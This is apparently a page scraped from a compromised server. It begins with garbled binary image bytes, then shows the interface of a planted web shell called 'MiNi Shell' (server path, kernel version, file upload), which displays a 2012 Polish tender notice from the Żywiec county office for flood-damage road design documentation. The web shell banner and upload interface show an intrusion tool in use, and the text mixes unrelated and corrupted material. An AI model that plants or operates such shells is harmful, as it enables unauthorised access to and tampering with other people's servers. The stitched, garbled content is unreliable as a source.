JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120127/26090-N-2012.html

<p class="kh_header"><b>Żywiec: Wykonanie dokumentacji projektowych dla zadań związanych z usuwaniem skutków powodzi z 2010r.</b><br>
<b>Numer ogłoszenia: 26090 - 2012; data zamieszczenia: 27.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Krasińskiego 13, 34-300 Żywiec, woj. śląskie, tel. 033 8612424, faks 033 8614623.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.zywiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowych dla zadań związanych z usuwaniem skutków powodzi z 2010r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie dokumentacji projektowych dla zadań związanych z usuwaniem skutków powodzi z 2010 r.
2.	Przedmiot zamówienia składa się z siedmiu następujących części:




CZĘŚĆ I:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1474 S (ul. Komonieckiego i Moszczanicka) o długości 1000 mb od km 1+175 do km 2+175 w m. Żywiec Etap I (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

CZĘŚĆ II:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1428 S Żywiec-Trzebinia-Juszczyna o długości 745 mb od km 0+325 do km 1+070 w m. Żywiec (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej Nr 1428 S Żywiec-Trzebinia-Juszczyna o długości 535 mb od km 4+325 do km 4+860 w m. Trzebinia (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 3. Remont uszkodzonego odcinka drogi powiatowej Nr 1428 S Żywiec-Trzebinia-Juszczyna o długości 445 mb od km 4+860 do km 5+305 w m. Juszczyna (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,



Część III:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1425 S Wieprz-Juszczyna-Jeleśnia o długości 1400 mb od km 9+450 do km 10+205 i od km 10+405 do km 11+050 w m. Juszczyna (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej Nr 1425 S Wieprz-Juszczyna-Jeleśnia o długości 435 mb od km 1+425 do km 1+860 w m. Wieprz (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 3. Remont uszkodzonego odcinka drogi powiatowej Nr 1430 S Bystra-Juszczynka o długości 400 mb od km 0+000 do km 0+400 w m. Bystra (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

CZĘŚĆ IV:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1415 S Pewel Mała-Pewel Ślemieńska-Ślemień o długości 1055 mb od km 8+360 do km 9+415 w m. Ślemień (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej nr 1415 S Pewel Mała-Pewel Ślemieńska-Ślemień o długości 520 mb od km 2+625 do km 3+145 w m. Pewel Mała (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 3. Remont uszkodzonego odcinka drogi powiatowej nr 1415 S Pewel Mała-Pewel Ślemieńska-Ślemień o długości 200 mb od km 6+705 do km 6+905 w m. Gilowice (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

CZĘŚĆ V:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1450 S Kamesznica-Koniaków o długości 800 mb od km 3+360 do km 4+160 w m. Kamesznica (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej nr 1443 S Rycerka Górna-Przegibek o długości 300 mb od km 2+445 do km 2+745 w m. Rycerka Górna (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 3. Remont uszkodzonego odcinka drogi powiatowej nr 1444 S Rycerka Dolna-Rycerka Górna- Polana o długości 305 mb od km 10+630 do km 10+935 w m. Rycerka Górna(wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)


Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Część VI:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1434 S Węgierska Górka - Żabnica o długości 700 mb od km 6+440 do km 7+140 w m. Żabnica (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej nr 1437 S Milówka-Nieledwia o długości 700 mb od km 1+610 do km 2+310 w m. Nieledwia (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 3. Remont uszkodzonego odcinka drogi powiatowej nr 1458 S Radziechowy-Twardorzeczka o długości 205 mb od km 1+005 do km 1+210 w m. Twardorzeczka (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

CZĘŚĆ VII:

Zadanie 1. Remont uszkodzonego odcinka drogi powiatowej Nr 1424 S Sopotnia Mała - Sopotnia Wielka o łącznej długości  4300 mb w km od 0+000 do km 7+620 w m. Sopotnia Wielka (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

Zadanie 2. Remont uszkodzonego odcinka drogi powiatowej nr 1417 S Jeleśnia - Pewel Wielka - Hucisko o długości 1900 mb od km 1+300 do 2+000  i od 2+900 do 4+100 w m. Pewel Wielka (wypłukana nawierzchnia i pobocze, zamulone i niedrożne rowy i przepusty)

Dokumentacja projektowa powinna zawierać:
- projekt wykonawczy - 4 egzemplarze,
- przedmiar robót - 2 egzemplarze,
- kosztorys inwestorski - 2 egzemplarze,
- szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych - 2 egzemplarze,
- wersja elektroniczna w formacie PDF,

3.	Dokumentacja powinna być sporządzona w oparciu o Rozporządzenie Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202, z 2004r., poz.2072 ze zm.).
4.	Przyjęte rozwiązania projektowe winny odpowiadać warunkom określonym w Rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 roku w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U., Nr 43 z 1999r., poz.430 ze zm.) oraz w oparciu o Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie (Dz. U. Nr 63, z 2000r., poz. 735 ze zm.),
5.	Kosztorys inwestorski i przedmiar robót powinny być wykonane zgodnie z obowiązującym rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. nr 130, z 2004r., poz. 1389),
6.	Zamawiający zastrzega sobie prawo do uzyskiwania od Wykonawcy informacji o postępie prac i przyjętych rozwiązaniach w trakcie projektowania, jak również prawa do zgłaszania swoich uwag, które Wykonawca uwzględni w dalszych pracach nad projektem.
7.	Wykonawca zobowiązuje się do nieodpłatnego i niezwłocznego udzielania wyjaśnień na ewentualne zapytania oferentów, jakie złożone zostaną w toku przetargu na wykonawstwo robót realizowanych na podstawie wykonanej przez niego dokumentacji projektowo-kosztorysowej, a także zajmowania stanowiska w przypadku złożenia odwołania.
8.	Termin rękojmi za wady przedmiotu umowy skończy się wraz z upływem terminu odpowiedzialności z tytułu rękojmi i gwarancji za wady robót budowlanych, wykonanych na podstawie dokumentacji będącej przedmiotem niniejszego postępowania. 
9.	Warunki dodatkowe:
9.1. Wykonawca zobowiązuje się do wykonania dokumentacji projektowej, stanowiącej przedmiot umowy zgodnie ze zleceniem Zamawiającego, zasadami współczesnej wiedzy technicznej, obowiązującymi w tym zakresie przepisami oraz zgodnie z normami.
9.2. Zaleca się oferentom, aby dokonali wizji lokalnej i uzyskali wszelkie informacje dla kompleksowego sporządzenia oferty;
9.3. Wykonawca przejmie na siebie wyłączną odpowiedzialność za wszelkie roszczenia z tytułu praw autorskich związanych z wykonywaną dokumentacją projektową. Zobowiązuje się on ponadto do pokrycia wszelkich kosztów wynikających z popełnionych błędów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający przewiduje obowiązek wniesienia wadium przed upływem terminu składania ofert, w wysokości określonej dla każdej z części w następujących kwotach:
a) dla CZEŚĆI I w wysokości: 350,00 zł,
b) dla CZĘŚĆI II w wysokości: 600,00 zł,
c) dla CZĘŚĆI III w wysokości: 600,00 zł.
a) dla CZEŚĆI IV w wysokości: 500,00 zł,
b) dla CZĘŚĆI V w wysokości: 400,00 zł,
c) dla CZĘŚĆI VI w wysokości: 500,00 zł.
c) dla CZĘŚĆI VII w wysokości: 800,00 zł.

W przypadku złożenia oferty na więcej niż jedną CZĘŚĆ, na dokumencie potwierdzającym wniesienie wadium należy wyszczególnić poszczególne kwoty wadium na każdą z CZĘŚCI.

2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
3.	Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Starostwa Powiatowego w Żywcu, na konto: Getin Noble Bank Oddział w Bielsku-Białej Filia w Żywcu 37 1560 1023 0000 9140 0000 0253.
4.	Wadium wnoszone w innej formie niż wyżej opisanej, należy składać w kasie Starostwa Powiatowego w Żywcu przy ul. Krasińskiego 13, I piętro, pok. nr 31, przy czym na każdą z CZĘŚCI należy złożyć oddzielny dokument.
5.	Terminowe wniesienie wadium w formie pieniężnej oznacza, że żądana przez Zamawiającego kwota została wpłacona w pełnej wysokości przelewem na wskazany przez niego rachunek bankowy. Oznacza to, że wniesienie wadium w tej postaci jest skuteczne dopiero z chwilą uznania rachunku Zamawiającego kwotą wadium przed upływem terminu składania ofert.
6.	Wadium wnoszone w innych formach będzie wniesione w terminie, jeżeli stosowny dokument zostanie zdeponowany u Zamawiającego przed upływem terminu składania ofert.
7.	Wykonawca, którego oferta nie zostanie zabezpieczona wadium, zostanie wykluczony z postępowania, a jego oferta uznana za odrzuconą.
8.	Nie przewiduje się wniesienia zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek wiedzy i doświadczenia oceniony zostanie na podstawie złożonego przez Wykonawcę oświadczenia (zał. Nr 3 do Specyfikacji) o wykonaniu usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Warunek zostanie uznany za spełniony, jeżeli Wykonawca oświadczy, że w tych latach wykonał co najmniej jedną usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj.: wykonał dokumentację projektową budowy, przebudowy, modernizacji lub remontu drogi - za kwotę minimum 10.000,00 PLN.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym oceniony zostanie na podstawie złożonego oświadczenia. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy na druku stanowiącym zał. Nr 2 do Specyfikacji, że dysponuje - (samodzielnie bądź udostępnionym przez inne podmioty) - potencjałem technicznym, zapewniającym wykonanie przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie oceniony na podstawie złożonego przez Wykonawcę oświadczenia, że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia. Warunek zostanie uznany za spełniony jeżeli wykonawca oświadczy, że osoby które będą uczestniczyć w wykonaniu zamówienia posiadają uprawnienia budowlane (o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane tekst jedn. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.) do projektowania w specjalności konstrukcyjno-budowlanej lub do projektowania w specjalności drogowej - co najmniej jedna osoba;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełniania sytuacji ekonomicznej i finansowej zostanie oceniony na podstawie złożonego przez Wykonawcę oświadczenia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca oświadczy na druku stanowiącym Załącznik Nr 2 do Specyfikacji, iż znajduje się w sytuacji ekonomicznej i finansowej niezbędnej do wykonania niniejszego zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

